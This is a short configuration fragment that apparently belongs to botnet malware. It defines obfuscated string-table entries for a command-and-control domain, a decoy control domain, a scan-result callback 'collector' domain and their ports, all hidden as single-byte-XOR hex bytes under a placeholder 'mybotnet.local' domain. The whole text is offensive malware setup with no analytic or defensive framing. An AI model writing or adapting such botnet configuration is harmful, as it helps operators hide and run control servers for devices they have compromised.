TABLE_CNC_DOMAIN = "\x41\x4C\x41\x0C\x4F\x5B\x40\x4D\x56\x4C\x47\x56\x0C\x4E\x4D\x41\x43\x4E\x22"
TABLE_CNC_PORT = "\x22\x72"

TABLE_FAKE_CNC_DOMAIN = \x44\x43\x49\x47\x41\x4C\x41\x0C\x4F\x5B\x40\x4D\x56\x4C\x47\x56\x0C\x4E\x4D\x41\x43\x4E\x22
TABLE_FAKE_CNC_PORT = \x22\x35

TABLE_SCAN_CB_DOMAIN = \x41\x4D\x4E\x4E\x47\x41\x56\x4D\x50\x0C\x4F\x5B\x40\x4D\x56\x4C\x47\x56\x0C\x4E\x4D\x41\x43\x4E\x22
TABLE_SCAN_CB_PORT = \x23\x99

TABLE_FAKE_SCAN_CB_DOMAIN = \x44\x43\x49\x47\x41\x4D\x4E\x4E\x47\x41\x56\x4D\x50\x0C\x4F\x5B\x40\x4D\x56\x4C\x47\x56\x0C\x4E\x4D\x41\x43\x4E\x22
TABLE_FAKE_SCAN_CB_PORT = \x99\xC7
